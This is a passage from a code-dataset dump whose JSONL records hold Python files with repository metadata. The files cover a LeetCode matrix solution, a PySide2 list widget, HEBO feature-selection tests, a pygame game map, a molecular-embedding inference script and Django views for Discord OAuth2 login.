len(mat[0])\n\n for r in range(m):\n for c in range(n):\n if mat[r][c] > 0:\n top = mat[r - 1][c] if r > 0 else math.inf\n left = mat[r][c - 1] if c > 0 else math.inf\n mat[r][c] = min(top, left) + 1\n\n for r in range(m - 1, -1, -1):\n for c in range(n - 1, -1, -1):\n if mat[r][c] > 0:\n bottom = mat[r + 1][c] if r < m - 1 else math.inf\n right = mat[r][c + 1] if c < n - 1 else math.inf\n mat[r][c] = min(mat[r][c], bottom + 1, right + 1)\n\n return mat", "repo_name": "RyanPioneer/Leetcode", "sub_path": "0501~1000/0542. 01 Matrix/main2.py", "file_name": "main2.py", "file_ext": "py", "file_size_in_byte": 1093, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "math.inf", "line_number": 24, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 25, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 31, "usage_type": "attribute"}, {"api_name": "math.inf", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "71772273084", "text": "from PySide2.QtCore import Qt\nfrom PySide2.QtGui import QMouseEvent\nfrom PySide2.QtWidgets import QListWidget, QAbstractItemView\n\nfrom component.scroll.smooth_scroll_bar import SmoothScrollBar\nfrom qt_owner import QtOwner\nfrom task.qt_task import QtTaskBase\n\n\nclass BaseListWidget(QListWidget, QtTaskBase):\n def __init__(self, parent):\n QListWidget.__init__(self, parent)\n QtTaskBase.__init__(self)\n self.page = 1\n self.pages = 1\n # self.verticalScrollBar().valueChanged.connect(self.OnMove)\n self.isLoadingPage = False\n self.LoadCallBack = None\n self.OpenBack = None\n self.LikeBack = None\n self.KillBack = None\n self.parentId = -1\n\n self.vScrollBar = SmoothScrollBar()\n self.vScrollBar.setOrientation(Qt.Orientation.Vertical)\n self.setVerticalScrollBar(self.vScrollBar)\n\n self.vScrollBar.MoveEvent.connect(self.OnActionTriggered)\n\n # QScroller.grabGesture(self.viewport(), QScroller.LeftMouseButtonGesture)\n self.setVerticalScrollMode(QAbstractItemView.ScrollMode.ScrollPerPixel)\n self.verticalScrollBar().setSingleStep(30)\n\n self.hScrollBar = SmoothScrollBar()\n self.hScrollBar.setOrientation(Qt.Orientation.Horizontal)\n self.setHorizontalScrollBar(self.hScrollBar)\n self.setHorizontalScrollMode(QAbstractItemView.ScrollMode.ScrollPerPixel)\n self.horizontalScrollBar().setSingleStep(30)\n # self.timer = QTimer()\n # self.timer.setInterval(1000)\n # self.timer.timeout.connect(self.TimeOut)\n\n self.wheelStatus = True\n self.lastClick = 0\n self.lastIndex = -1\n self.doubleClickType = 0\n self.wheelMode = 0\n\n def ClearWheelEvent(self):\n pass\n # self.vScrollBar.stop()\n\n def SetWheelStatus(self, status):\n self.wheelStatus = status\n\n def wheelEvent(self, arg__1) -> None:\n if not self.wheelStatus:\n return\n if self.wheelMode == 0:\n self.vScrollBar.ScrollValue(-arg__1.angleDelta().y())\n else:\n self.hScrollBar.ScrollValue(-arg__1.angleDelta().y())\n\n def OnActionTriggered(self):\n if self.isLoadingPage:\n return\n if self.page >= self.pages:\n return\n if self.verticalScrollBar().sliderPosition() == self.verticalScrollBar().maximum():\n self.ClearWheelEvent()\n self.isLoadingPage = True\n if self.LoadCallBack:\n self.LoadCallBack()\n\n def UpdatePage(self, page, pages):\n self.page = page\n self.pages = pages\n\n def UpdateState(self, isLoading=False):\n self.isLoadingPage = isLoading\n\n def clear(self) -> None:\n QListWidget.clear(self)\n\n # 防止异步加载时,信息错乱\n self.ClearTask()\n self.vScrollBar.ResetValue(0)\n\n def mousePressEvent(self, event: QMouseEvent):\n if event.button() == Qt.ForwardButton:\n # QtOwner().SwitchWidgetNext()\n event.ignore()\n elif event.button() == Qt.BackButton:\n event.ignore()\n # QtOwner().SwitchWidgetLast()\n return QListWidget.mousePressEvent(self, event)", "repo_name": "orgTestCodacy11KRepos110MB/repo-5768-ehentai-qt", "sub_path": "src/component/list/base_list_widget.py", "file_name": "base_list_widget.py", "file_ext": "py", "file_size_in_byte": 3210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 10, "usage_type": "name"}, {"api_name": "task.qt_task.QtTaskBase", "line_number": 10, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QListWidget.__init__", "line_number": 12, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 12, "usage_type": "name"}, {"api_name": "task.qt_task.QtTaskBase.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "task.qt_task.QtTaskBase", "line_number": 13, "usage_type": "name"}, {"api_name": "component.scroll.smooth_scroll_bar.SmoothScrollBar", "line_number": 24, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Orientation", "line_number": 25, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 25, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView.ScrollMode", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView", "line_number": 31, "usage_type": "name"}, {"api_name": "component.scroll.smooth_scroll_bar.SmoothScrollBar", "line_number": 34, "usage_type": "call"}, {"api_name": "PySide2.QtCore.Qt.Orientation", "line_number": 35, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 35, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView.ScrollMode", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QAbstractItemView", "line_number": 37, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QListWidget.clear", "line_number": 83, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 83, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QMouseEvent", "line_number": 89, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.ForwardButton", "line_number": 90, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 90, "usage_type": "name"}, {"api_name": "PySide2.QtCore.Qt.BackButton", "line_number": 93, "usage_type": "attribute"}, {"api_name": "PySide2.QtCore.Qt", "line_number": 93, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QListWidget.mousePressEvent", "line_number": 96, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QListWidget", "line_number": 96, "usage_type": "name"}]} +{"seq_id": "3847169021", "text": "# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.\r\n\r\n# This program is free software; you can redistribute it and/or modify it under\r\n# the terms of the MIT license.\r\n\r\n# This program is distributed in the hope that it will be useful, but WITHOUT ANY\r\n# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A\r\n# PARTICULAR PURPOSE. See the MIT License for more details.\r\n\r\nimport sys, os\r\nsys.path.append(os.path.abspath(os.path.dirname(__file__)) + '/../')\r\n\r\nimport pytest\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom hebo.models.nn.fe_deep_ensemble import FeNet, FeDeepEnsemble\r\nfrom hebo.models.nn.gumbel_linear import GumbelSelectionLayer, GumbelNet, GumbelDeepEnsemble\r\nfrom .util import check_prediction\r\n\r\ndef test_fe_net():\r\n net = FeNet(2, 0, 1)\r\n x = torch.randn(10, 2)\r\n y = net(x, None)\r\n assert torch.isfinite(y).all()\r\n\r\n t = torch.rand(())\r\n net = FeNet(2, 0, 1, temperature = t)\r\n assert net.feature_select.temperature == t\r\n\r\n@pytest.mark.parametrize('fe_layer', ['concrete', 'hard_concrete', 'stg'])\r\ndef test_fe_ensemble(fe_layer):\r\n x = torch.randn(300, 10)\r\n y = x[:, 0].view(-1, 1)\r\n model = FeDeepEnsemble(x.shape[1], 0, 1, \r\n output_noise = False,\r\n num_ensembles = 1,\r\n num_processes = 1,\r\n num_epochs = 1, \r\n fe_layer = fe_layer, \r\n )\r\n model.fit(x, None, y)\r\n with torch.no_grad():\r\n py, ps2 = model.predict(x, None)\r\n check_prediction(y, py, ps2)\r\n\r\n\r\ndef test_gumbel_linear():\r\n torch.manual_seed(42)\r\n x = torch.randn(100, 5)\r\n with torch.no_grad():\r\n layer = GumbelSelectionLayer(5, 1, temperature = 1e-6)\r\n res = x - layer(x)\r\n assert res.var(axis = 0).min() < 1e-3\r\n \r\n layer.temperature = 1e6\r\n res = x - layer(x)\r\n assert res.var(axis = 0).min() > 1e-1\r\n\r\ndef test_gumbel_net():\r\n net = GumbelNet(2, 0, 1, reduced_dim = 1)\r\n x = torch.randn(10, 2)\r\n y = net(x, None)\r\n\r\ndef test_gumbel_ensemble():\r\n x = torch.randn(300, 10)\r\n y = x[:, 0].view(-1, 1)\r\n model = GumbelDeepEnsemble(x.shape[1], 0, 1, \r\n reduced_dim = 2,\r\n num_epochs = 1)\r\n model.fit(x, None, y)\r\n assert model.models[0].reduced_dim == 2\r\n with torch.no_grad():\r\n py, ps2 = model.predict(x, None)\r\n check_prediction(y, py, ps2)\r\n", "repo_name": "huawei-noah/HEBO", "sub_path": "HEBO/test/test_concrete.py", "file_name": "test_concrete.py", "file_ext": "py", "file_size_in_byte": 2536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2286, "dataset": "github-code", "pt": "41", "api": [{"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "hebo.models.nn.fe_deep_ensemble.FeNet", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.isfinite", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 28, "usage_type": "call"}, {"api_name": "hebo.models.nn.fe_deep_ensemble.FeNet", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 34, "usage_type": "call"}, {"api_name": "hebo.models.nn.fe_deep_ensemble.FeDeepEnsemble", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 44, "usage_type": "call"}, {"api_name": "util.check_prediction", "line_number": 46, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 32, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 52, "usage_type": "call"}, {"api_name": "hebo.models.nn.gumbel_linear.GumbelSelectionLayer", "line_number": 53, "usage_type": "call"}, {"api_name": "hebo.models.nn.gumbel_linear.GumbelNet", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 67, "usage_type": "call"}, {"api_name": "hebo.models.nn.gumbel_linear.GumbelDeepEnsemble", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 74, "usage_type": "call"}, {"api_name": "util.check_prediction", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "43055107909", "text": "import pygame\nimport kit\nimport random\n\ndef direction_to_wall(direction):\n\tif (direction[0] == 0):\n\t\tif (direction[1] > 0):\n\t\t\t# down\n\t\t\treturn 1\n\t\telse:\n\t\t\t# up\n\t\t\treturn 4\n\telif (direction[0] > 0):\n\t\t# right\n\t\treturn 2\n\telse:\n\t\t# left\n\t\treturn 8\n\nclass KitInMap(object):\n\tdef __init__(self, kit, grid_position):\n\t\tself.kit = kit\n\t\tself.grid_position = grid_position\n\nclass GameMap(object):\n\tdef __init__(self, position, size, color_bk, grid_size, grids, width_wall, color_wall):\n\t\tself.position = position\n\t\tself.size = size\n\t\tself.color = color_bk\n\t\tself.grid_size = grid_size\n\t\tself.grids = grids\n\t\tself.color_wall = color_wall\n\t\tself.width_wall = width_wall\n\t\tself.map_size = ( int(size[0]/grid_size[0]), int(size[1]/grid_size[1]) ) # X*Y grids in this map\n\n\tdef grid_position(self, map_position):\n\t\treturn ( self.position[0] + int(map_position[0]*self.grid_size[0]),\n\t\t self.position[1] + int(map_position[1]*self.grid_size[1]) )\n\n\tdef grid_center(self, map_position):\n\t\treturn ( self.position[0] + int((map_position[0]+0.5)*self.grid_size[0]),\n\t\t self.position[1] + int((map_position[1]+0.5)*self.grid_size[1]) ) \n\n\tdef detect_grid(self, position):\n\t\treturn (int((position[0]-self.position[0])/self.grid_size[0]),\n\t\t int((position[1]-self.position[1])/self.grid_size[1])) \n \n\t# Kits Contorl\n\tdef kit_reset(self, kit_max, kit_freq):\n\t\tself.kit_roster = [kit.KitSpeedUp, kit.KitReverse] # defined here currently. may be a argument if necessary\n\t\tself.kit_max = kit_max\n\t\tself.kit_freq = kit_freq\n\t\tself.kit_freq_count = 0\n\t\tself.kit_list = []\n\n\tdef kit_gen(self):\n\t\t# cannot generate kit in a closed grid\n\t\tmap_position = (random.randint(0, self.map_size[0]-1), random.randint(0, self.map_size[1]-1))\n\t\twhile ( self.grids[ map_position[0]+map_position[1]*self.map_size[0] ] == 15 ):\n\t\t\tmap_position = (random.randint(0, self.map_size[0]-1), random.randint(0, self.map_size[1]-1))\n\n\t\tself.kit_list.append( KitInMap( random.choice(self.kit_roster)(), map_position ) )\n\n\tdef kit_progress(self):\n\t\tif ( len(self.kit_list) < self.kit_max and self.kit_freq_count == self.kit_freq ):\n\t\t\tself.kit_gen()\n\t\t\tself.kit_freq_count = 0\n\t\telse:\n\t\t\tself.kit_freq_count = self.kit_freq_count + 1\n\n\t# Drawing\n\tdef draw_kit(self, sur):\n\t\tfor kitinmap in self.kit_list:\n\t\t\tgrid_center = self.grid_center(kitinmap.grid_position)\n\t\t\tsur.blit( kitinmap.kit.sur_icon, (grid_center[0]-kitinmap.kit.size_icon[0]/2, grid_center[1]-kitinmap.kit.size_icon[1]/2) )\n\n\tdef draw_grid(self, sur, grid_position, grid_size, grid):\n\t\t### graw wall\n\t\t# down side 0001\n\t\tif (grid & 1 == 1):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0], grid_position[1]+grid_size[1]-self.width_wall, self.grid_size[0], self.width_wall))\n\t\t# right side 0010\n\t\tif (grid & 2 == 2):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0]+grid_size[0]-self.width_wall, grid_position[1], self.width_wall, self.grid_size[1]))\n\t\t# up side 0100\n\t\tif (grid & 4 == 4):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0], grid_position[1], self.grid_size[0], self.width_wall))\n\t\t# left side 1000\n\t\tif (grid & 8 == 8):\n\t\t\tpygame.draw.rect(sur, self.color_wall, \n\t\t\t\t(grid_position[0], grid_position[1], self.width_wall, self.grid_size[1]))\n\n\tdef draw(self, sur):\n\t\tpygame.draw.rect( sur, self.color, self.position+self.size)\n\t\tfor i in range(len(self.grids)):\n\t\t\t# grid center for debugging\n\t\t\t# pygame.draw.circle(sur, self.color_wall, self.grid_center( (int(i%self.map_size[0]), int(i/self.map_size[0])) ), 2) \n\t\t\tself.draw_grid(sur, \n\t\t\t\t( int(i%self.map_size[0])*self.grid_size[0]+self.position[0], int(i/self.map_size[0])*self.grid_size[1]+self.position[1] ), \n\t\t\t\tself.grid_size, \n\t\t\t\t self.grids[i])\n\t\tself.draw_kit( sur )\n", "repo_name": "nyphoon/BreakBack", "sub_path": "game_map.py", "file_name": "game_map.py", "file_ext": "py", "file_size_in_byte": 3711, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "kit.KitSpeedUp", "line_number": 50, "usage_type": "attribute"}, {"api_name": "kit.KitReverse", "line_number": 50, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 60, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 81, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 85, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 89, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 89, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 93, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 93, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 97, "usage_type": "attribute"}]} +{"seq_id": "577804973", "text": "\"\"\"\nRuibo test inference. \nloading the model and convering mols.\n\nThe data loader returns return ((gs_charge, atom_type, pos, nums_atoms), fps), idxs\nall of them are lists\n\n原始数据包括 array, fp, idx\narray 可以从 from_mol_to_array() 得\n转换写在 ZINCH5Dataloader._get_batch\n把 array 转化成 (gs_charge, atom_type, pos, nums_atoms)\n\ninfer() 输入的array 包括 gs_charge, atom_type, pos, nums_atoms\n需要 from_mol_to_array() -> 转换 -> (gs_charge, atom_type, pos, nums_atoms) tuple 格式\n\"\"\"\n\nimport torch\nimport pandas as pd\nimport numpy as np\nfrom rdkit.Chem import MolFromSmiles, AddHs, AllChem, DataStructs\nfrom model.networks import ForceFieldCapsNet\nfrom data.force_field import from_mol_to_array\n\nfrom torch.utils.data import Dataset, DataLoader\n\n#%%\nclass ChEMBLE_Data(Dataset):\n def __init__(self, batch_array, batch_fp, batch_idx):\n \"\"\"\n Parameters\n ----------\n batch_array : iterable\n DESCRIPTION.\n batch_fp : iterable\n DESCRIPTION.\n batch_idx : iterable\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n \"\"\"\n idxs, fps = [], []\n nums_atoms, gs_charge, atom_type, pos = [], [], [], []\n for array, fp, idx in zip(batch_array, batch_fp, batch_idx): # see Dataset __getitem__\n # array = self.restore_flat_array(array) # 从from_mol_to_array() 得来已经是原格式了\n nums_atoms.append(len(array[0]))\n gs_charge += array[0]\n atom_type += array[1]\n pos += array[2]\n fps.append(fp.tolist()) # array to list\n # idxs.append(int(idx)) # np.int to int # 现在用 str index\n idxs.append(idx)\n self.data = ( ((gs_charge, atom_type, pos, nums_atoms), fps), idxs )\n\n\n def __len__(self):\n return len(self.fp)\n \n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n # @staticmethod\n # def restore_flat_array(fa):\n # fa = fa.reshape(-1, 5)\n # return (fa[:, 0].tolist(),\n # fa[:, 1].astype('int').tolist(),\n # fa[:, 2:].tolist())\n \n def get_array(self):\n return self.data[0][0]\n\n#%%\n\ndef convert_df_to_array_batch(df: pd.DataFrame) -> tuple:\n # 可能不需要一批一批处理,应该是单个的,但一批的可以用,不改了。\n array_list = []\n for idx, each_row in df.iterrows():\n mol = MolFromSmiles(each_row[\"Smiles\"])\n molh = AddHs(mol)\n AllChem.EmbedMolecule(molh)\n arr = from_mol_to_array(molh)\n array_list.append(arr)\n idx_list = df.index.to_list()\n\n nums_atoms, gs_charge, atom_type, pos = [], [], [], []\n for array, idx in zip(array_list, idx_list): # see Dataset __getitem__\n # array = self.restore_flat_array(array) # 从from_mol_to_array() 得来已经是原格式了\n nums_atoms.append(len(array[0]))\n gs_charge += array[0]\n atom_type += array[1]\n pos += array[2]\n return (gs_charge, atom_type, pos, nums_atoms), arr\n\n#%%\nif __name__ == \"__main__\":\n \n df = pd.read_table(\"G:/topological_regression/data/ChEMBL/test_data.txt\", index_col=0).iloc[:2]\n # list of field arrays fps\n array_list = []\n fp_list = np.zeros((len(df), 1024))\n i = 0\n for idx, each_row in df.iterrows():\n mol = MolFromSmiles(each_row[\"Smiles\"])\n molh = AddHs(mol)\n AllChem.EmbedMolecule(molh)\n arr1 = from_mol_to_array(molh)\n array_list.append(arr1)\n\n fp2 = AllChem.GetMorganFingerprintAsBitVect(molh, 2, nBits=1024)\n DataStructs.ConvertToNumpyArray(fp2, fp_list[i])\n\n idx_list = df.index.to_list()\n dataset = ChEMBLE_Data(array_list, fp_list, idx_list)\n array_to_infer = dataset.get_array()\n\n\n array_to_infer2, arr2 = convert_df_to_array_batch(df)\n\n #%%\n test_list = []\n for ii in range(10):\n molh = AddHs(mol)\n AllChem.EmbedMolecule(molh) # 每次All Chem embed 之后位置都不一样\n arr_test = from_mol_to_array(molh)[2]\n test_list.append(arr_test)\n raise\n #%%\n model = ForceFieldCapsNet(num_digit_caps=1024)\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-3) # change to whatever optimizer was used\n\n checkpoint = torch.load(\"tf3p_trained_models/TF3P-ECFP4-b1024-GS50-W5.pt\")\n model.load_state_dict(checkpoint)\n\n\n embed = model.infer(array_to_infer)\n \n\n embed1 = model.infer(array_to_infer)\n embed2 = model.infer(array_to_infer2)\n\n", "repo_name": "Ribosome25/TF3P", "sub_path": "inference_test.py", "file_name": "inference_test.py", "file_ext": "py", "file_size_in_byte": 4546, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.utils.data.Dataset", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.is_tensor", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 77, "usage_type": "attribute"}, {"api_name": "rdkit.Chem.MolFromSmiles", "line_number": 81, "usage_type": "call"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 82, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 83, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 83, "usage_type": "name"}, {"api_name": "data.force_field.from_mol_to_array", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.read_table", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "rdkit.Chem.MolFromSmiles", "line_number": 106, "usage_type": "call"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 107, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 108, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 108, "usage_type": "name"}, {"api_name": "data.force_field.from_mol_to_array", "line_number": 109, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.GetMorganFingerprintAsBitVect", "line_number": 112, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 112, "usage_type": "name"}, {"api_name": "rdkit.Chem.DataStructs.ConvertToNumpyArray", "line_number": 113, "usage_type": "call"}, {"api_name": "rdkit.Chem.DataStructs", "line_number": 113, "usage_type": "name"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 125, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 126, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 126, "usage_type": "name"}, {"api_name": "data.force_field.from_mol_to_array", "line_number": 127, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 131, "usage_type": "name"}, {"api_name": "model.networks.ForceFieldCapsNet", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 132, "usage_type": "attribute"}, {"api_name": "model.networks.parameters", "line_number": 132, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "model.networks.load_state_dict", "line_number": 135, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 135, "usage_type": "name"}, {"api_name": "model.networks.infer", "line_number": 138, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 138, "usage_type": "name"}, {"api_name": "model.networks.infer", "line_number": 141, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 141, "usage_type": "name"}, {"api_name": "model.networks.infer", "line_number": 142, "usage_type": "call"}, {"api_name": "model.networks", "line_number": 142, "usage_type": "name"}]} +{"seq_id": "11219921017", "text": "import os\nimport asyncio\nimport httpx\nfrom dotenv import load_dotenv\nfrom datetime import datetime, timedelta\n\nfrom django.shortcuts import render, redirect, HttpResponse\n\nfrom django_utils import get_session_data, set_session, delete_session\n\nload_dotenv('./.env')\n\nCLIENT_ID = os.getenv('CLIENT_ID')\nCLIENT_SECRET = os.getenv('CLIENT_SECRET')\nAPI_ENDPOINT = 'https://discord.com/api'\nTOKEN_ENDPOINT = 'https://discord.com/api/oauth2/token'\nUSER_ENDPOINT = 'https://discord.com/api/users/@me'\nREDIRECT_URI = 'http://127.0.0.1:8000/callback'\nSCOPE = 'identify%20email%20guilds'\nOAUTH2_URL = f'https://discord.com/api/oauth2/authorize?client_id={CLIENT_ID}&redirect_uri=http%3A%2F%2F127.0.0.1%3A8000%2Fcallback&response_type=code&scope=identify%20email%20guilds'\n\n\ndef main(request):\n request.session.set_test_cookie()\n return redirect('home/')\n\n@sync_to_async\ndef manage_test_cookie(request):\n if request.session.test_cookie_worked():\n # try:\n # request.session.delete_test_cookie()\n # except:\n # pass\n return True\n else:\n return False\n\nasync def index(request):\n if await manage_test_cookie(request) is False:\n return redirect('/cookiedisabled/')\n\n context = {\n 'logged_in': False,\n 'avatar': None\n }\n\n _access_token = await get_session_data(request, 'ACCESS_TOKEN')\n if _access_token:\n _expires_on = await get_session_data(request, 'EXPIRES_ON')\n _expires_on = datetime.strptime(_expires_on, '%Y-%m-%d %H:%M:%S.%f') if _expires_on else None\n\n if _expires_on:\n if (_expires_on - datetime.utcnow()).seconds > 43200:\n context['logged_in'] = True\n headers = {\"Authorization\": f\"Bearer {_access_token}\"}\n resp = httpx.get(USER_ENDPOINT, headers=headers)\n resp.raise_for_status()\n data = resp.json()\n\n if not data['avatar']:\n context['avatar'] = f'https://cdm.discordapp.com/embed/avatars/{int(data[\"discriminator\"]) % 5}.png'\n elif str(data['avatar']).startswith('a_'):\n context['avatar'] = f'https://cdn.discordapp.com/avatars/{data[\"id\"]}/{data[\"avatar\"]}.gif'\n else:\n context['avatar'] = f'https://cdn.discordapp.com/avatars/{data[\"id\"]}/{data[\"avatar\"]}.png'\n\n return render(request, 'home/index.html', context)\n\nasync def login(request):\n if await manage_test_cookie(request) is False:\n return redirect('/cookiedisabled/')\n\n _access_token = await get_session_data(request, 'ACCESS_TOKEN')\n if _access_token:\n _expires_on = await get_session_data(request, 'EXPIRES_ON')\n _expires_on = datetime.strptime(_expires_on, '%Y-%m-%d %H:%M:%S.%f') if _expires_on else None\n\n if _expires_on:\n if (_expires_on - datetime.utcnow()).seconds > 43200:\n return redirect('/dashboard/')\n\n _refresh_token = await get_session_data(request, 'REFRESH_TOKEN')\n if _refresh_token:\n data = {\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': 'refresh_token',\n 'refresh_token':_refresh_token\n }\n resp = httpx.post(TOKEN_ENDPOINT, data=data)\n resp.raise_for_status()\n _resp_content = resp.json()\n\n await set_session(request, 'ACCESS_TOKEN', _resp_content['access_token'])\n await set_session(request, 'EXPIRES_ON', datetime.utcnow() + timedelta(seconds=_resp_content['expires_in']))\n\n return redirect('/dashboard/')\n\n return redirect(OAUTH2_URL)\n\nasync def callback(request):\n _code = request.GET.get('code')\n data = {\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'grant_type': 'authorization_code',\n 'code': _code,\n 'redirect_uri': REDIRECT_URI\n }\n resp = httpx.post(TOKEN_ENDPOINT, data=data)\n resp.raise_for_status()\n _resp_content = resp.json()\n\n _expiry_time = datetime.utcnow() + timedelta(seconds=_resp_content['expires_in'])\n\n await set_session(request, 'ACCESS_TOKEN', _resp_content['access_token'])\n await set_session(request, 'EXPIRES_ON', _expiry_time.strftime('%Y-%m-%d %H:%M:%S.%f'))\n\n return redirect('/dashboard/')\n\nasync def logout(request):\n await delete_session(request, 'ACCESS_TOKEN')\n await delete_session(request, 'EXPIRES_ON')\n return redirect('/')\n\ndef noscript(request):\n return render(request, 'utils/noscript.html')\n\ndef cookiedisabled(request):\n return render(request, 'utils/cookiedisabled.html')", "repo_name": "AkshuAgarwal/Aperture-Dashboard", "sub_path": "home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 40, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 47, "usage_type": "call"}, {"api_name": "django_utils.get_session_data", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 50, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "httpx.get", "line_number": 56, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 71, 